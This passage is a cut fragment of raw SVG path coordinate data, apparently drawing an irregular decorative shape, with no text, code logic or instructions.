2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1